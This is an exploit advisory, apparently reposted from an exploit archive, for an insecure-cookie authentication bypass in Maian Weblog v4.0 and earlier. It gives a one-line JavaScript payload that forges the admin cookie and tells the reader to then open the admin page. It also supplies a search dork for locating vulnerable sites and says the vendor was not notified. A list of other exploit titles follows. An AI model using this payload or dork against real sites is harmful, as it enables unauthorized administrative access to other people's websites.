-[*] ================================================================================ [*]-
-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by Maian Weblog v4.0
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie
exists.
and not the content. so we can easyily craft a cookie and look like a admin.
[*] Vulnerability:
javascript:document.cookie = "weblog_cookie=1; path=/";
[*] NOTE/TIP:
after running the javascript, visit "/admin/index.php" to view admin area.
-[*] ================================================================================ [*]-
-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
【Maian Weblog】相关文章:
★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit
★ Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit
★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
★ MFORUM 0.1a Arbitrary Add-Admin Vulnerability
★ Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
★ GeekLog
★ MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
★ Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
★ Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities